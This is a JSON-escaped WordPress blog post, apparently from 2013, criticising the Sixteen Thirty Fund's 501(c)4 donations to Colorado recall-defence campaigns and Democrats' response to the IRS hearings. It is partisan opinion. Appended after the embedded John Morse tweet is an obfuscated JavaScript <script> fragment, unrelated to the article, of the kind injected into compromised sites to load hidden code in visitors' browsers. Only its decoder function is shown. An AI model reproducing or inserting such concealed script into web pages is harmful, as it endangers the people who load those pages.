Her defense campaign, called Puebloans for Angela, <strong>received a $35,000 contribution from the Sixteen Thirty Fund in Washington<\/strong>; a $20,000 contribution from a Denver organization called Citizens for Integrity; and a $15,000 contribution from a Denver group called Mainstream Colorado. (emphasis added &#8211; ed.)<\/p><\/blockquote>\n<p>The Sixteen Thirty Fund has been organized as a 501(c)4 since Feb. 16 of 2009 (we wonder how long it had to wait for IRS approval), <a href=\"http:\/\/990s.foundationcenter.org\/990_pdf_archive\/264\/264486735\/264486735_200912_990O.pdf\" target=\"_blank\">according to its 2009 IRS Form 990<\/a>, and its mission, as state on Page 2 of that documents is:<\/p>\n<blockquote><p>Sixteen Thirty Fund operates exclusively for the purpose of promoting social welfare, including, but not limited to, providing public education on and conducting advocacy regarding progressive policies.<\/p><\/blockquote>\n<p>The fund operated as a collector and distributor of over $3.3 million for various left-wing causes during 2009, including $52,000 to our very own Progress Now here in Colorado. \u00a0It won&#8217;t come as any surprise that most of those groups, including ones that are clearly political organizations, are also organized as 501(c)4s.<\/p>\n<p>Now, I don&#8217;t have any problem with these or any other groups organizing as 501(c)4s, if the law allows that. \u00a0But it&#8217;s telling that Democrats have decided to turn the various IRS hearings into a trial of the tax law, one which they were perfectly happy to take full advantage of as long as the other side didn&#8217;t. \u00a0Having kept Tea Party, conservative, and libertarian groups on the sidelines through two election cycles, they can now afford to be outraged at unfair treatment, and call for a revision of the law.<\/p>\n<p>And of course, there&#8217;s this, from Senate President John Morse, fighting his own recall battle:<\/p>\n<blockquote class=\"twitter-tweet\"><p>I intend to fight this \u2013 we cannot allow outside interest groups to determine what is best for Colorado. <a href=\"https:\/\/twitter.com\/search\/%23coleg\">#coleg<\/a> <a href=\"https:\/\/twitter.com\/search\/%23copolitics\">#copolitics<\/a> <a href=\"https:\/\/twitter.com\/search\/%23GunSafety\">#GunSafety<\/a><\/p>\n<p>\u2014 John Morse (@SenJohnMorse) <a href=\"https:\/\/twitter.com\/SenJohnMorse\/status\/341945228145590272\">June 4, 2013<\/a><\/p><\/blockquote>\n<p>&nbsp;<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Well, what do we have here?
